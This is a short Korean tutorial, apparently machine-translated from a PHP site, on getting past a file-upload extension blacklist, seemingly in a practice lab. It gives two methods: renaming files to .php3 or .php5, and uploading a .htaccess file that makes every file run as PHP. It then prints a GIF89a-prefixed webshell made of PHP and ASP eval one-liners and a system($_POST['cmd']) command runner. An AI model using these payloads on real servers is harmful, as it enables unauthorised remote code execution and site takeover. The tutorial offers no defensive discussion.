이 글에서는 주로 파일 업로드를 통해 블랙리스트를 우회하는 방법을 소개합니다. 이제 특정 참조 가치가 있어 공유합니다. 도움이 필요한 친구들이 참고할 수 있습니다.
이 레벨은 주로 업로드 접미사를 설정하고, asp, php, jsp 등의 접미사는 업로드할 수 없습니다.
위치 1: 이 우회 방법은 접미사를 .php3, php5 등으로 수정하는 것입니다. 여기에 블랙리스트 확인('.asp', '.aspx', '.php', '.jsp')이 있습니다. php3, php5... 및 서버에서 구문 분석할 수 있는 기타 접미사 이름을 업로드하세요
위치 2: 우회하도록 파일 구문 분석 규칙을 다시 작성
1. 먼저 다음 내용을 포함하는 .htaccess이라는 파일을 업로드하세요. :
SetHandler application/x-httpd-php
2. 스크립트
내용:
GIF89a
<?php eval($_POST['joker']);?>
<%eval request("joker")%>
<?php system($_POST['cmd']);?>
<span style="max-width:90%"><br/>最后查看结果如下:<br/><img src="https://img.php.cn/upload/article/000/000/009/8c177c6b99f31ac79c542a12d4053de9-3.png" alt=""/><br/></span>
이상이 이 글의 전체 내용입니다. 더 많은 관련 내용을 보시려면 PHP 중국어 웹사이트를 주목해주세요!
관련 권장 사항:
PHP는 Azure Storage Blob을 사용하여 파일을 업로드합니다
위 내용은 파일 업로드 시 블랙리스트를 우회하는 방법의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!
![[웹 프런트엔드] Node.js 빠른 시작](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
